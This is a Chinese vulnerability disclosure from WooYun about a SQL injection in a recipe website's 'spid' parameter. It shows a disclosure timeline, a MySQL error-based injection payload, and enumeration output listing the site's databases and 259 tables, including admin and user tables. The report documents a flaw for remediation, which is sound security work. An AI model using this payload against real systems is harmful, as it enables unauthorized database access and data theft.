漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0132287
漏洞标题:中国菜谱网主站某功能一处sql注入
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2015-08-13 21:11
修复时间:2015-09-28 11:24
公开时间:2015-09-28 11:24
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-14: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开
简要描述:
数据泄露或危及旁站
详细说明:
漏洞证明:
---
Parameter: spid (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace
Payload: spid=(SELECT 6583 FROM(SELECT COUNT(*),CONCAT(0x71786a6271,(SELECT
(ELT(6583=6583,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHAR
ACTER_SETS GROUP BY x)a)
---
[05:40:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
available databases [3]:
[*] caipu
[*] information_schema
[*] test
Database: caipu
[259 tables]
+-----------------------------+
| admin_action |
| admin_group |
| admin_group_action |
| admin_log |
| admin_login_record |
| admin_user |
| admin_user_group |
| cp_caipu_attention |
| cp_caipu_collection |
| cp_caipu_data |
| cp_caipu_fans |
| cp_caipu_message |
| cp_caipu_message_info |
| cp_caipu_sp |
| cp_caipu_spinfo |
| cp_ecms_article |
| cp_ecms_article_check |
| cp_ecms_article_check_data |
| cp_ecms_article_data_1 |
| cp_ecms_article_doc |
| cp_ecms_article_doc_data |
| cp_ecms_article_doc_index |
| cp_ecms_article_index |
| cp_ecms_download |
| cp_ecms_download_check |
| cp_ecms_download_check_data |
| cp_ecms_download_data_1 |
| cp_ecms_download_doc |
| cp_ecms_download_doc_data |
| cp_ecms_download_doc_index |
| cp_ecms_download_index |
| cp_ecms_flash |
| cp_ecms_flash_check |
| cp_ecms_flash_check_data |
| cp_ecms_flash_data_1 |
| cp_ecms_flash_doc |
| cp_ecms_flash_doc_data |
| cp_ecms_flash_doc_index |
| cp_ecms_flash_index |
| cp_ecms_info |
| cp_ecms_info_check |
| cp_ecms_info_check_data |
| cp_ecms_info_data_1 |
| cp_ecms_info_doc |
| cp_ecms_info_doc_data |
| cp_ecms_info_doc_index |
| cp_ecms_info_index |
| cp_ecms_infoclass_article |
| cp_ecms_infoclass_download |
| cp_ecms_infoclass_flash |
| cp_ecms_infoclass_info |
| cp_ecms_infoclass_movie |
| cp_ecms_infoclass_news |
| cp_ecms_infoclass_photo |
| cp_ecms_infoclass_shop |
| cp_ecms_infotmp_article |
| cp_ecms_infotmp_download |
| cp_ecms_infotmp_flash |
| cp_ecms_infotmp_info |
| cp_ecms_infotmp_movie |
| cp_ecms_infotmp_news |
| cp_ecms_infotmp_photo |
| cp_ecms_infotmp_shop |
| cp_ecms_movie |
| cp_ecms_movie_check |
| cp_ecms_movie_check_data |
| cp_ecms_movie_data_1 |
| cp_ecms_movie_doc |
| cp_ecms_movie_doc_data |
| cp_ecms_movie_doc_index |
| cp_ecms_movie_index |
| cp_ecms_news |
| cp_ecms_news_check |
| cp_ecms_news_check_data |
| cp_ecms_news_click |
| cp_ecms_news_data_1 |
| cp_ecms_news_doc |
| cp_ecms_news_doc_data |
| cp_ecms_news_doc_index |
| cp_ecms_news_index |
| cp_ecms_news_yygs |
| cp_ecms_photo |
| cp_ecms_photo_check |
| cp_ecms_photo_check_data |
| cp_ecms_photo_data_1 |
| cp_ecms_photo_doc |
| cp_ecms_photo_doc_data |
| cp_ecms_photo_doc_index |
| cp_ecms_photo_index |
| cp_ecms_shop |
| cp_ecms_shop_check |
| cp_ecms_shop_check_data |
| cp_ecms_shop_data_1 |
| cp_ecms_shop_doc |
| cp_ecms_shop_doc_data |
| cp_ecms_shop_doc_index |
| cp_ecms_shop_index |
| cp_ecms_xgwz |
| cp_enewsad |
| cp_enewsadclass |
| cp_enewsadminstyle |
| cp_enewsbefrom |
| cp_enewsbq |
| cp_enewsbqclass |
| cp_enewsbqtemp |
| cp_enewsbqtempclass |
| cp_enewsbuybak |
| cp_enewsbuygroup |
| cp_enewscard |
| cp_enewsclass |
| cp_enewsclass_stats |
| cp_enewsclass_stats_ip |
| cp_enewsclass_stats_set |
| cp_enewsclassadd |
| cp_enewsclassf |
| cp_enewsclassnavcache |
| cp_enewsclasstemp |
| cp_enewsclasstempclass |
| cp_enewsdiggips |
| cp_enewsdo |
| cp_enewsdolog |
| cp_enewsdownerror |
| cp_enewsdownrecord |
| cp_enewsdownurlqz |
| cp_enewserrorclass |
| cp_enewsf |
| cp_enewsfava |
| cp_enewsfavaclass |
| cp_enewsfeedback |
| cp_enewsfeedbackclass |
| cp_enewsfeedbackf |
| cp_enewsfile |
| cp_enewsfile_1 |
| cp_enewsfile_member |
| cp_enewsfile_other |
| cp_enewsfile_public |
| cp_enewsgbook |
| cp_enewsgbookclass |
| cp_enewsgfenip |
| cp_enewsgroup |
| cp_enewshmsg |
| cp_enewshnotice |
| cp_enewshy |
| cp_enewshyclass |
| cp_enewsindexpage |
| cp_enewsinfoclass |
| cp_enewsinfotype |
| cp_enewsinfovote |
| cp_enewsjstemp |
| cp_enewsjstempclass |
| cp_enewskey |
| cp_enewskeyclass |
| cp_enewslink |
| cp_enewslinkclass |
| cp_enewslinktmp |
| cp_enewslisttemp |
| cp_enewslisttempclass |
| cp_enewslog |
| cp_enewsloginfail |
| cp_enewsmember |
| cp_enewsmember_connect |
| cp_enewsmember_connect_app |
| cp_enewsmemberadd |
| cp_enewsmemberf |
| cp_enewsmemberfeedback |
| cp_enewsmemberform |
| cp_enewsmembergbook |
| cp_enewsmembergroup |
| cp_enewsmemberpub |
| cp_enewsmenu |
| cp_enewsmenuclass |
| cp_enewsmod |
| cp_enewsnewstemp |
| cp_enewsnewstempclass |
| cp_enewsnotcj |
| cp_enewsnotice |
| cp_enewspage |
| cp_enewspageclass |
| cp_enewspagetemp |
| cp_enewspayapi |
| cp_enewspayrecord |
| cp_enewspic |
| cp_enewspicclass |
| cp_enewspl |
| cp_enewspl_1 |
| cp_enewspl_data_1 |
| cp_enewspl_set |
| cp_enewsplayer |
| cp_enewsplf |
| cp_enewspltemp |
| cp_enewspostdata |
| cp_enewspostserver |
| cp_enewsprinttemp |
| cp_enewspublic |
| cp_enewspublic_update |
| cp_enewspubtemp |
| cp_enewspubvar |
| cp_enewspubvarclass |
| cp_enewsqmsg |
| cp_enewssearch |
| cp_enewssearchall |
| cp_enewssearchall_load |
| cp_enewssearchtemp |
| cp_enewssearchtempclass |
| cp_enewsshop_address |
| cp_enewsshop_ddlog |
| cp_enewsshop_precode |
| cp_enewsshop_set |
| cp_enewsshopdd |
| cp_enewsshopdd_add |
| cp_enewsshoppayfs |
| cp_enewsshopps |
| cp_enewssp |
| cp_enewssp_1 |
| cp_enewssp_2 |
| cp_enewssp_3 |
| cp_enewssp_3_bak |
| cp_enewsspacestyle |
| cp_enewsspclass |
| cp_enewssql |
| cp_enewstable |
| cp_enewstags |
| cp_enewstagsclass |
| cp_enewstagsdata |
| cp_enewstask |
| cp_enewstempbak |
| cp_enewstempdt |
| cp_enewstempgroup |
| cp_enewstempvar |
| cp_enewstempvarclass |
| cp_enewstogzts |
| cp_enewsuser |
| cp_enewsuseradd |
| cp_enewsuserclass |
| cp_enewsuserjs |
| cp_enewsuserjsclass |
| cp_enewsuserlist |
| cp_enewsuserlistclass |
| cp_enewsuserloginck |
| cp_enewsvote |
| cp_enewsvotemod |
| cp_enewsvotetemp |
| cp_enewswapstyle |
| cp_enewswfinfo |
| cp_enewswfinfolog |
| cp_enewswords |
| cp_enewsworkflow |
| cp_enewsworkflowitem |
| cp_enewswriter |
| cp_enewsyh |
| cp_enewszt |
| cp_enewsztadd |
| cp_enewsztclass |
| cp_enewsztf |
| cp_enewsztinfo |
| cp_enewszttype |
| cp_enewszttypeadd |
| cp_user |
| cp_userinfo |
+-----------------------------+
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-08-14 11:23
厂商回复:
CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。
最新状态:
暂无